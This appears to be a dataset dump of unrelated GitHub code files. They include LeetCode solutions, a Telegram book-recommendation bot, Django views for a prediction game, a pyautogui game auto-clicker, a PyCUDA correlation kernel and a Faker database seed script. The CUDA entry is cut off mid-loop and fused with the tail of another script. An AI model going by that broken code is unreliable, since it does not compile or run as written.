+{"seq_id":"72685358624","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val, children):\n self.val = val\n self.children = children\n\"\"\"\n\nfrom collections import deque\n\nclass Solution:\n def maxDepth(self, root: 'Node') -> int:\n if root is None:\n return 0\n\n self.max_depth = 0\n self._helper(root, 1)\n\n return self.max_depth\n \n def _helper(self, node, depth: int):\n self.max_depth = max(depth, self.max_depth)\n for child in node.children:\n if child is not None:\n self._helper(child, depth+1)\n","repo_name":"daviddwlee84/LeetCode","sub_path":"Python3/BinaryTree/MaximumDepthOfNaryTree/Naive559.py","file_name":"Naive559.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"}
+{"seq_id":"22961876795","text":"# Zadatak 1.15Napisati program koji imitira rad bafera. Maksimalni broj elemenata u baferuje5. Korisnik sa standardnog ulaza unosi podatke do unosa rečiquit. Program ih smešta u bafer,posto se bafer napuni unosi se ispisuju na standarni izlaz i bafer se prazn\n\nbufer = [] \n\ni = 0 \n\nwhile (True):\n try:\n bufer.append(int(input()))\n i += 1\n \n if i == 5:\n i = 0\n print(bufer)\n bufer = []\n print(\"bufer se ispraznio\")\n continue\n\n except:\n print(\"FAILED\")\n break","repo_name":"fongsd/pp","sub_path":"pp/python/1_15.py","file_name":"1_15.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"25872478405","text":"import pandas as pd\nimport numpy as np\nimport scipy.sparse as sp\nimport time, copy, os, pickle, re\nfrom lightfm import LightFM\nfrom fuzzywuzzy import fuzz, process\n\nfrom utils import (\n DatasetFaster,\n fetch_user_ratings_dataset,\n fetch_user_ratings_goodreads,\n predict_list,\n load_model,\n book_map,\n fancy_title,\n fancy_list\n)\n\nfrom config import *\n\nfrom telegram import Update, ReplyKeyboardMarkup\nfrom telegram.ext import (\n Updater,\n CommandHandler,\n MessageHandler,\n Filters,\n ConversationHandler,\n CallbackQueryHandler,\n CallbackContext,\n)\n\n\nCHOOSING_SCENARIO, SELECTING_ENGINE = map(chr, range(2))\nCHOOSING_USER_ID, CHOOSING_GR_ID, CHOOSING_CUSTOM = map(chr, range(2, 5))\nTYPING_USER, TYPING_GOODREADS, TYPING_BOOK, SELECTING_RATING = map(chr, range(5, 9))\n\n\ndef start(update, context):\n context.user_data['user_ratings'] = None\n context.user_data['rated_dict'] = {}\n context.user_data['selected_book'] = None\n \n update.message.reply_text(text=start_text, disable_web_page_preview=True)\n \n buttons = [[\n 'Dataset Id',\n 'GoodReads Id',\n 'Custom Setup'\n ]]\n keyboard = ReplyKeyboardMarkup(buttons, one_time_keyboard=True)\n update.message.reply_text(text=scenario_text, reply_markup=keyboard)\n\n return CHOOSING_SCENARIO\n\n\ndef recommend(update, context):\n buttons = [[\n 'LightFM',\n #'Hybrid LightFM'\n ]]\n keyboard = ReplyKeyboardMarkup(buttons, one_time_keyboard=True)\n update.message.reply_text(text=recommend_text, reply_markup=keyboard)\n\n return SELECTING_ENGINE\n\n\ndef ask_user_id(update, context):\n update.message.reply_text(text=id_text)\n \n return TYPING_USER\n\n\ndef ask_user_id_again(update, context):\n update.message.reply_text(text=wrongid_text)\n \n return TYPING_USER\n\n\ndef save_user_id(update, context):\n try:\n user_id = int(update.message.text)\n context.user_data['user_ratings'] = fetch_user_ratings_dataset(user_id)\n return recommend(update, context)\n except ValueError:\n return ask_user_id_again(update, context)\n\n\ndef ask_goodreads_id(update, context):\n update.message.reply_text(text=gr_text)\n \n return TYPING_GOODREADS\n\n\ndef ask_goodreads_id_again(update, context):\n update.message.reply_text(text=nouser_text)\n \n return TYPING_GOODREADS\n\n\ndef save_goodreads_id(update, context):\n try:\n goodreads_id = int(re.search('[0-9]+', update.message.text).group())\n context.user_data['user_ratings'] = fetch_user_ratings_goodreads(goodreads_id)\n return recommend(update, context)\n except:\n return ask_goodreads_id_again(update, context)\n\n \ndef inform_books_rating(update, context):\n update.message.reply_text(text=rating_text)\n \n return ask_book_rating(update, context)\n\n\ndef ask_book_rating(update, context):\n buttons = [['Finish']]\n keyboard = ReplyKeyboardMarkup(buttons, one_time_keyboard=True)\n update.message.reply_text(text=askbook_text, reply_markup=keyboard)\n \n return TYPING_BOOK\n\n\ndef save_selected_book(update, context):\n book_name = update.message.text\n selected_book = process.extract(book_name, book_map['title'].values, scorer=fuzz.ratio)[0][0]\n context.user_data['selected_book'] = selected_book\n\n return show_selected_book(update, context)\n\n\ndef show_selected_book(update, context):\n buttons = [['1', '2', '3', '4', '5'],\n ['Cancel', 'Finish']]\n keyboard = ReplyKeyboardMarkup(buttons, one_time_keyboard=True)\n update.message.reply_text(text=fancy_title(context.user_data['selected_book']),\n parse_mode='HTML',\n disable_web_page_preview=True)\n 
update.message.reply_text(text=nowrate_text, reply_markup=keyboard)\n\n return SELECTING_RATING\n\n\ndef save_book_rating(update, context):\n book_rating = int(update.message.text)\n context.user_data['rated_dict'][context.user_data['selected_book']] = book_rating\n\n return ask_book_rating(update, context)\n\n\ndef rating_finished(update, context):\n books, rates = zip(*context.user_data['rated_dict'].items())\n book_ids = book_map['id'][book_map['title'].isin(books)].values\n\n context.user_data['user_ratings'] = pd.DataFrame(\n {'user_id': np.repeat(0, len(book_ids)), 'book_id': book_ids, 'rating': rates})\n\n return recommend(update, context)\n\n\ndef rec_lightfm(update, context):\n lightfm = load_model('lightfm1.pickle')\n warn = update.message.reply_text(text=wait_text)\n \n ratings = pd.read_csv('data/ratings.csv')\n dataset = DatasetFaster()\n dataset.fit(ratings.user_id.nunique(), 10000)\n interactions_new, weights_new = dataset.build_interactions(ratings, context.user_data['user_ratings'])\n\n lightfm.fit_partial(\n interactions=interactions_new,\n sample_weight=weights_new\n )\n \n reclist = predict_list(lightfm, context.user_data['user_ratings'])\n # warn.edit_text(text=fancy_list(reclist), parse_mode='HTML', disable_web_page_preview=True)\n rec = update.message.reply_text(text=fancy_list(reclist), parse_mode='HTML', disable_web_page_preview=True)\n\n\nconvhandler = ConversationHandler(\n entry_points=[CommandHandler('start', start)],\n states={\n CHOOSING_SCENARIO: [\n MessageHandler(Filters.regex('^Dataset Id$'), ask_user_id),\n MessageHandler(Filters.regex('^GoodReads Id$'), ask_goodreads_id),\n MessageHandler(Filters.regex('^Custom Setup$'), inform_books_rating)\n ],\n TYPING_USER: [\n MessageHandler(Filters.text & ~Filters.command, save_user_id)\n ],\n TYPING_GOODREADS: [\n MessageHandler(Filters.text & ~Filters.command, save_goodreads_id)\n ],\n TYPING_BOOK: [\n MessageHandler(Filters.text & ~Filters.command & ~Filters.regex('^Finish$'), save_selected_book),\n MessageHandler(Filters.regex('^Finish$'), rating_finished)\n ],\n SELECTING_RATING: [\n MessageHandler(Filters.regex('^[1-5]$'), save_book_rating),\n MessageHandler(Filters.regex('^Finish$'), rating_finished),\n MessageHandler(Filters.regex('^Cancel$'), ask_book_rating)\n ],\n SELECTING_ENGINE: [\n MessageHandler(Filters.regex('^LightFM$'), rec_lightfm),\n # MessageHandler(Filters.regex('^Hybrid LightFM$'), rec_lightfm_hybrid)\n ]\n },\n fallbacks=[CommandHandler('start', start)]\n)\n\n\ndef main():\n TOKEN = os.environ['TOKEN']\n PORT = int(os.environ.get('PORT', '8443'))\n \n updater = Updater(token=TOKEN, use_context=True)\n dispatcher = updater.dispatcher\n dispatcher.add_handler(convhandler)\n updater.start_webhook(\n listen='0.0.0.0',\n port=PORT,\n url_path=TOKEN,\n webhook_url='https://goodbooks-bot.herokuapp.com/' + TOKEN\n )\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yuasosnin/goodbooks-recommender","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"1449174706","text":"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nPREDICTION/VIEWS.py\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\nimport os\nimport json\nfrom random import randint\n\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.utils.safestring import mark_safe\nfrom django.conf import settings\n\nimport common.utility as CU\nimport football.models.football as FM\nimport members.models.members as MM\nimport prediction.models.universal as PU\n\nimport logging\nprog_lg = logging.getLogger('progress')\nexcp_lg = logging.getLogger('exception')\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nUNIVERSAL\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\n\ndef univ_preds(request):\n bk = FM.TimeMachine.GetTodaysBracket()\n prog_lg.debug(bk)\n context = {\n 'season': bk['season'],\n 'round': bk['round'],\n 'now_dt': mark_safe(json.dumps(MM.Profile_Reporter.GetUserNow(request.user))),\n 'spectrumOpts': [\"Home Win\", \"Away Win\", \"Tie\", \"Abstain\"],\n 'players': mark_safe(json.dumps(FM.Reports_General.GetPlayersBySeason(bk['season']))),\n 'abilsOwned': mark_safe(json.dumps(PU.Reporter.GetAbilitiesOwned(request.user, bk['season']))),\n 'abilsUsedRound': mark_safe(json.dumps(PU.Reporter.GetAbilsUsedByRound(request.user, bk['season'], bk['round']))),\n 'fixture': mark_safe(json.dumps(PU.Reporter_Common.GetFixtureLocalized(bk['season'], bk['round'], request.user))),\n 'predictions': mark_safe(json.dumps(PU.Editor.GetOrCreatePreds(bk['season'], bk['round'], request.user))),\n }\n return render(request, 'pu_predictions.html', context)\n\n\ndef univ_headq(request):\n season = FM.TimeMachine.GetTodaysBracket()['season']\n \n context = {\n 'roster': PU.Reporter.GetUserRoster(request.user, season),\n 'abilsOwned': PU.Reporter.GetAbilitiesOwned(request.user, season),\n 'store': PU.Reporter_Store.GetStoreData(),\n 'storeAvailable': PU.Reporter_Store.GetStoreAvailable(request.user, season),\n }\n return render(request, 'pu_headquarters.html', context)\n\n\ndef univ_ranks(request): \n seasons = FM.Reports_General.GetSeasons()\n #seasons = ['IPL2015']\n season = FM.TimeMachine.GetTodaysBracket()['season']\n roundList = FM.Reports_General.GetRounds(season, \"lastData\")\n roundv = roundList[0] if roundList else None\n \n puRecord = PU.Reporter.GetRecord(request.user, season, roundv) \n rankData = PU.Reporter_Ranks.RunRankData(season, roundv, \"Friends\", request.user)\n \n context = {\n 'seasons': seasons,\n 'roundList': roundList,\n 'modes': [\"Friends\", \"Yours\", \"Top Users\"],\n \n # logged user's performance\n \n 'status': mark_safe(json.dumps(puRecord['status'])),\n 'recordAT': mark_safe(json.dumps(puRecord['recordAT'])),\n 'recordRD': mark_safe(json.dumps(puRecord['recordRD'])),\n 'thresholds': mark_safe(json.dumps(puRecord['thresholds'])),\n \n # points distribution\n \n 'userCntAT': rankData['userCntAT'],\n 'binCntAT': rankData['binCntAT'],\n 'histAT': mark_safe(json.dumps(rankData['histAT'])),\n 'gradeAT': mark_safe(json.dumps(rankData['gradeAT'])),\n 'highlightAT': mark_safe(json.dumps(rankData['highlightAT'])),\n \n 
'userCntRD': rankData['userCntRD'],\n 'binCntRD': rankData['binCntRD'],\n 'histRD': mark_safe(json.dumps(rankData['histRD'])),\n 'gradeRD': mark_safe(json.dumps(rankData['gradeRD'])),\n 'highlightRD': mark_safe(json.dumps(rankData['highlightRD'])),\n \n # leaderboards\n \n 'ranksAT': mark_safe(json.dumps(rankData['ranksAT'])),\n 'ranksRD': mark_safe(json.dumps(rankData['ranksRD'])),\n }\n return render(request, 'pu_standings.html', context)\n\n\ndef univ_rules(request):\n context = {\n }\n return render(request, 'pu_rules.html', context)\n\n\ndef universal_jx(request, command):\n \n prog_lg.info(\"ajax edit command: \" + command)\n \n \n if command == 'get_fixtSummary':\n season = request.GET.get('season')\n hret = PU.Reporter.GetFixturesSummary(season) \n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n elif command == 'delete_events': \n hret = PU.Editor_Admin.DeleteEvents()\n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n \n elif command == 'update_accumulator': \n hret = PU.Editor.PopTokenAccumulator(request.user)\n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n elif command == 'update_buyUpgrade': \n upgradeType = request.POST.get('upgradeType')\n upgradeLevel = request.POST.get('upgradeLevel')\n hret = PU.Editor.UpgradeBuy(request.user, upgradeType, upgradeLevel)\n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n \n elif command == 'update_prediction': \n pred_st = request.POST.get('pred_st')\n pred_dx = json.loads(pred_st)\n hret = PU.Editor.SavePrediction(request.user, pred_dx)\n \n bk = FM.TimeMachine.GetTodaysBracket()\n hret.results = {\n 'saveRes': hret.results,\n 'now_dt': MM.Profile_Reporter.GetUserNow(request.user),\n 'abilsOwned': PU.Reporter.GetAbilitiesOwned(request.user, bk['season']),\n 'abilsUsedRound': PU.Reporter.GetAbilsUsedByRound(request.user, bk['season'], bk['round']),\n 'predictions': PU.Editor.GetOrCreatePreds(bk['season'], bk['round'], request.user),\n }\n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n elif command == 'get_predictions': \n season = FM.TimeMachine.GetTodaysBracket()['season']\n roundv = request.GET.get('round')\n \n hret = CU.HttpReturn()\n hret.status = 201\n hret.results = {\n 'now_dt': MM.Profile_Reporter.GetUserNow(request.user),\n 'abilsOwned': PU.Reporter.GetAbilitiesOwned(request.user, season),\n 'abilsUsedRound': PU.Reporter.GetAbilsUsedByRound(request.user, season, roundv),\n 'fixture': PU.Reporter_Common.GetFixtureLocalized(season, roundv, request.user),\n 'predictions': PU.Editor.GetOrCreatePreds(season, roundv, request.user),\n }\n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n \n elif command == 'get_ranksRnd':\n mode = request.GET.get('mode')\n season = request.GET.get('season')\n \n roundList = FM.Reports_General.GetRounds(season, 'lastData')\n if not roundList:\n roundList = ['01']\n lastRound = roundList[0] # list is sorted descending\n \n results = PU.Reporter_Ranks.RunRankData(season, lastRound, mode, request.user)\n puRecord = PU.Reporter.GetRecord(request.user, season, lastRound)\n \n results = dict(results, **puRecord);\n results['roundList'] = roundList\n \n hret = CU.HttpReturn()\n hret.results = results\n hret.status = 201\n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n elif command == 'get_ranks':\n mode = request.GET.get('mode')\n season = request.GET.get('season')\n roundv = request.GET.get('roundv')\n \n results = PU.Reporter_Ranks.RunRankData(season, 
roundv, mode, request.user)\n puRecord = PU.Reporter.GetRecord(request.user, season, roundv) \n results = dict(results, **puRecord);\n \n hret = CU.HttpReturn()\n hret.results = results\n hret.status = 201\n return JsonResponse(hret.results, safe=False, status=hret.status)\n \n \n else:\n msg = \"command invalid: \" + command\n excp_lg.error(msg)\n return JsonResponse(msg, safe=False, status = 404)\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nEND OF FILE\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"","repo_name":"PhilBusko/PersianLeague","sub_path":"prediction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"8845612311","text":"import time\nimport numpy as np\nimport pyautogui\n\npyautogui.moveTo(1520, 800)\npyautogui.click()\n\n\ndef capture():\n position = pyautogui.position()\n screenshot = pyautogui.screenshot(region=(position[0] - 1, position[1] - 1, 1, 1))\n screenshot = np.array(screenshot)\n return screenshot[0, 0]\n\n\nclick_counter = 0\nmax_click = 100\nis_cast = True\nwhile True:\n color_code = capture()\n print(color_code, click_counter)\n if is_cast and color_code[0] > 100 and color_code[1] > 110 and color_code[2] > 110:\n time.sleep(0.5)\n pyautogui.moveTo(1520, 800)\n pyautogui.click()\n click_counter += 1\n is_cast = False\n if color_code[0] > 130 and color_code[1] > 175 and color_code[2] > 110:\n pyautogui.moveTo(1520, 800)\n pyautogui.click()\n click_counter += 1\n is_cast = True\n time.sleep(3)\n if click_counter >= max_click:\n break\n","repo_name":"Bug-Too/clicky","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"4241413541","text":"import atexit\n\nimport numpy as np\n\nimport pycuda.driver as cuda\nimport pycuda.gpuarray as gpuarray\nfrom pycuda.compiler import SourceModule\nfrom pycuda.driver import ctx_flags\n\ncuda.init()\ncudadevice = cuda.Device(0)\ncudacontext = cudadevice.make_context(flags=ctx_flags.SCHED_YIELD)\natexit.register(cudacontext.pop)\n\nimport skcuda\nfrom skcuda.misc import _get_minmax_kernel\nskcuda.misc._global_cublas_allocator = cuda.mem_alloc\n\nfrom .pattern import Pattern\n\n\nclass PatternCUDA(Pattern):\n\n mod = SourceModule(\"\"\"\n __global__ void correlate(float *input, float *patterns, float *result, int range_low, int range_high)\n {\n int x = (threadIdx.x + (blockDim.x*blockIdx.x));\n int y = (threadIdx.y + (blockDim.y*blockIdx.y));\n int iidx = x * 8;\n int ridx = (x * blockDim.y * gridDim.y) + y;\n int pidx = y * 24;\n \n float d;\n result[ridx] = 0;\n \n for (int i=range_low;i d[most]:\n most = key\n\nprint(most, d[most])\n","repo_name":"demidovakatya/notebooks","sub_path":"old_python_code/most_messages.py","file_name":"most_messages.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"17764492765","text":"from subprocess import Popen, PIPE, STDOUT\n\n\ndef test_nbi_jupyterhub():\n p = Popen(['jupyterhub', '--debug'], stdin=PIPE, stdout=PIPE, stderr=STDOUT)\n running = False\n for line in p.stdout:\n if 'JupyterHub is now running at' in str(line):\n running = True\n break\n\n assert running\n","repo_name":"ucphhpc/docker-jupyterhub","sub_path":"hub/tests/test_jupyterhub.py","file_name":"test_jupyterhub.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"72157435424","text":"import pandas as pd\nfrom datetime import datetime\nimport datetime as dt\nimport csv\nimport os\n\n\nVIDNAME = 0\nQ_START = 5\nQ_END = 6\nDB_START = 3\nDB_END = 4\nSIM = 2\nLENGTH = 7\n\nWHITE = '\\u001b[37m'\nBLUE = '\\033[94m'\nGREEN = '\\033[92m'\nYELLOW = '\\033[93m'\nRED = '\\033[91m'\nENDC = '\\033[0m'\nGREY = '\\u001b[38;5;244m'\nBOLD = '\\u001b[1m'\nBOLDOFF = '\\u001b[21m'\nUNDERLINE = '\\u001b[4m'\n\ndef join_from_path(logpath1, logpath2, destdir):\n log1 = pd.read_csv(logpath1, index_col=None)\n log2 = pd.read_csv(logpath2, index_col=None)\n\n result = log1\n\n log1 = log1.reset_index()\n log1.columns.values[0] = 'id'\n log1['id'] = log1.index\n\n nonzero1 = log1.loc[log1['Confidence'] > 0]\n nonzero2 = log2.loc[log2['Confidence'] > 0]\n\n for index1, row1 in nonzero1.iterrows():\n for index2, row2 in nonzero2.iterrows():\n if ((row1['Database Video'] == row2['Database Video']) and ((row2['Start Time'] <= row1['Start Time'] < row2['End Time']) or (row1['Start Time'] <= row2['Start Time'] < row1['End Time']))):\n l1 = row1['End Time'] - row1['Start Time']\n l2 = row2['End Time'] - row2['Start Time']\n p1 = l1 / (l1 + l2)\n p2 = l2 / (l1 + l2)\n newscore = row1['Confidence']*p1 + row2['Confidence']*p2\n result.iloc[index1, result.columns.get_loc('Confidence')] = newscore\n result.iloc[index1, result.columns.get_loc('Start Time')] = min(row1['Start Time'], row2['Start Time'])\n result.iloc[index1, result.columns.get_loc('Query Start Time')] = min(row1['Query Start Time'], row2['Query Start Time'])\n result.iloc[index1, result.columns.get_loc('End Time')] = max(row1['End Time'], row2['End Time'])\n result.iloc[index1, result.columns.get_loc('Query End Time')] = max(row1['Query End Time'], row2['Query End Time'])\n\n # print(result)\n outpath = os.path.join(destdir, \"combined.mp4.csv\")\n result.to_csv(outpath, index=False)\n return outpath\n\ndef read_logfile(logpath, shortestmatch):\n logfile = pd.read_csv(logpath, index_col=None)\n\n df = logfile.groupby('Database Video').sum().reset_index()\n threshold = df['Confidence'].mean() + 1.5*df['Confidence'].std()\n df = df.loc[df['Confidence'] > threshold]\n df['Length'] = (df['End Time'] - df['Start Time']) / 1000.\n df = df.sort_values(['Confidence', 'Length'])\n video_names = df['Database Video'].tolist()\n\n # df['Length'] = df.apply(lambda row: float(row['End Time'] - row['Start Time']) / 1000, axis=1)\n df = df.loc[df['Length'] > shortestmatch]\n logfile = logfile[logfile['Database Video'].isin(df['Database Video']).tolist()]\n logfile['Length'] = (logfile['End Time'] - logfile['Start Time']) / 1000.\n\n with open(\"./results/resultcache.txt\", \"w\") as file:\n for item in video_names:\n file.write(f\"{item}\\n\")\n\n return logfile.to_numpy()\n\ndef str_timestamp(num_ms):\n n_sec = int(dt.timedelta(milliseconds=num_ms).total_seconds())\n\n n_hrs = n_sec // 3600\n n_sec = n_sec % 3600\n\n n_min = n_sec // 60\n n_sec = n_sec % 60\n\n return \"{:02d}:{:02d}:{:02d}\".format(n_hrs, n_min, n_sec)\n\n\ndef print_log(logfile):\n if len(logfile) < 1:\n print(\"NO MATCHES FOUND\")\n return\n print(f\"\\n{BOLD}MATCH(ES) FOUND:{ENDC}\\n\")\n print(\"{}:{:>30}{:>16}{:>20}{:>24}{:>24}\".format(\n \"#\", \"Name of Matching Video\",\"Similarity\",\"Length (sec.)\", \"Range in DB\", \"Range in Query\"))\n for i, row in enumerate(logfile):\n score = row[SIM] * 100\n score_color = RED\n if score > 90:\n score_color = GREEN\n elif score > 75:\n score_color = YELLOW\n\n db_range = \"{} - {}\".format(\n 
str_timestamp(row[DB_START]),\n str_timestamp(row[DB_END]))\n query_range = \"{} - {}\".format(\n str_timestamp(row[Q_START]),\n str_timestamp(row[Q_END]))\n print(\"{}:\\033[94m{:>30}\\033[0m{}{:>15.3f}%\\033[0m\\u001b[38;5;244m{:>20}{:>24}{:>24}\\033[0m\".format(\n i, row[VIDNAME],score_color,score,row[LENGTH],db_range, query_range))\n print(\"\\n\")\n","repo_name":"cnagda/id-pirated-vid","sub_path":"python/logfile.py","file_name":"logfile.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"69804165982","text":"# 给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是 回文串 。返回 s 所有可能的分割方案。 \n# \n# 回文串 是正着读和反着读都一样的字符串。 \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入:s = \"aab\"\n# 输出:[[\"a\",\"a\",\"b\"],[\"aa\",\"b\"]]\n# \n# \n# 示例 2: \n# \n# \n# 输入:s = \"a\"\n# 输出:[[\"a\"]]\n# \n# \n# \n# \n# 提示: \n# \n# \n# 1 <= s.length <= 16 \n# s 仅由小写英文字母组成 \n# \n# Related Topics 字符串 动态规划 回溯 👍 808 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def partition(self, s: str) -> List[List[str]]: # 回溯+DP\n length = len(s)\n judge = [[False] * length for _ in range(length)]\n sublist = []\n container = []\n for i in range(length):\n judge[i][i] = True\n for start in range(length - 1, 0, -1):\n for end in range(start, length):\n judge[start - 1][end] = (start >= end - 1 or judge[start][end - 1]) \\\n and s[start - 1] == s[end]\n\n def backtrack(start=0):\n if start == length:\n container.append(sublist[:])\n for end in range(start, length):\n if judge[start][end]:\n sublist.append(s[start: end + 1])\n backtrack(end + 1)\n sublist.pop()\n\n backtrack()\n return container\n\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"xxsddm/Algorithm-Beginner","sub_path":"leetcode/0101-0200/[131]分割回文串.py","file_name":"[131]分割回文串.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"7609939139","text":"#!/bin/python3\n\nimport sys\n\nN = int(input())\narr = list(map(int,input().split()))\n\nif all([x % 2 == 0 for x in arr]):\n print(0)\n\nelif all([x % 2 != 0 for x in arr]):\n if N % 2 == 0:\n print(N)\n else:\n print('NO')\n\nelse:\n count = 0\n\n if arr[0] % 2 != 0 and arr[1] % 2 == 0:\n arr[0] += 1\n arr[1] += 1\n count += 2\n\n for i in range(1, N):\n if arr[i] % 2 != 0 and arr[i - 1] % 2 != 0:\n arr[i] += 1\n arr[i - 1] += 1\n count += 2\n if arr[i] % 2 != 0 and arr[i - 1] % 2 == 0:\n if i + 1 != N:\n arr[i] += 1\n arr[i + 1] += 1\n count += 2\n\n if arr[-1] % 2 != 0:\n print('NO')\n else:\n print(count)\n","repo_name":"H-Shen/Collection_of_my_coding_practice","sub_path":"Hackerrank/Algorithms/Fair_Rations.py3","file_name":"Fair_Rations.py3","file_ext":"py3","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"36895552246","text":"from app import app, db\nfrom faker import Faker\nfrom models import User, Product, Brand, Category, Invoice, InvoiceProducts, Invoice, Role\nfrom datetime import datetime\nfrom sqlalchemy.orm import sessionmaker\nimport random\n\nfake = Faker()\n\nwith app.app_context():\n db.create_all()\n def delete_data():\n # this deletes existing db data in columns \n print(\"🦸 Delete_data...\")\n User.query.delete()\n Product.query.delete()\n Category.query.delete()\n Brand.query.delete()\n Invoice.query.delete()\n InvoiceProducts.query.delete()\n Role.query.delete()\n \n def seed_data():\n print(\"🦸♀️ Seeding User Roles...\")\n admin_role = Role(name='Admin')\n db.session.add(admin_role)\n\n client_role = Role(name='Client')\n db.session.add(client_role)\n\n print(\"🦸♀️ Seeding Users with Faker...\")\n roles = [1] + [random.choice([2, 3, 4]) for _ in range(49)]\n\n for i in range(50): # Generate 50 fake users\n user = User(\n first_name=fake.first_name(),\n last_name=fake.last_name(),\n username=fake.user_name(),\n email=fake.email(),\n ph_address=fake.address(),\n password=fake.password(),\n telephone=fake.phone_number(),\n city_town=fake.city(),\n role=roles[i] \n )\n db.session.add(user)\n\n db.session.commit()\n\n print(\"🦸♀️ Seeding Brands with Faker...\")\n for _ in range(50): # Generate 2 fake brands\n brand = Brand(\n brand_name=fake.company(),\n brand_logo=fake.url()\n )\n db.session.add(brand)\n\n categories = (\"skin\", \"face\", \"nails\", \"eyes\", \"hair\")\n print(\"🦸♀️ Seeding Categories with Faker...\")\n for _ in range(5): # Generate 4 fake categories\n category_name = fake.unique.random_element(elements=categories)\n category = Category(cat_name=category_name)\n db.session.add(category)\n\n print(\"🦸♀️ Seeding Products with Faker...\")\n product_1 = Product(image=\"https://images.pexels.com/photos/3373739/pexels-photo-3373739.jpeg?auto=compress&cs=tinysrgb&w=1260&h=750&dpr=1\", p_name=\"Huddah Lipstick - Red Velvet\", description=\"High-quality red lipstick that provides a smooth and long-lasting finish. Perfect for any occasion.\", price=200, quantity=30, category=1, brand=1)\n product_2 = Product(image=\"https://images.pexels.com/photos/5403543/pexels-photo-5403543.jpeg?auto=compress&cs=tinysrgb&w=1260&h=750&dpr=1\", p_name=\"Rihanna Mascara - Volume Boost\", description=\"Achieve voluminous lashes with Rihanna's mascara. This mascara lifts, separates, and adds volume for a dramatic look.\", price=100, category=1,quantity=50, brand=2)\n product_3 = Product(image=\"https://images.pexels.com/photos/3685523/pexels-photo-3685523.jpeg?auto=compress&cs=tinysrgb&w=1260&h=750&dpr=1\", p_name=\"Urban Chic Eyeshadow Palette\", description=\"Explore a variety of shades with this eyeshadow palette. From subtle neutrals to bold colors, create endless eye looks.\", price=250, category=3, quantity=200 ,brand=1)\n product_4 = Product(image=\"https://images.pexels.com/photos/2661256/pexels-photo-2661256.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"Luxury Makeup Brush Set\", description=\"Upgrade your makeup routine with this luxurious brush set. The soft bristles and ergonomic handles ensure a flawless application.\", price=150, category=4,quantity=34, brand=2)\n product_5 = Product(image=\"https://images.pexels.com/photos/6417915/pexels-photo-6417915.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"Maybelline Lip Gloss - Pink Delight\", description=\"Shiny and moisturizing lip gloss by Maybelline. 
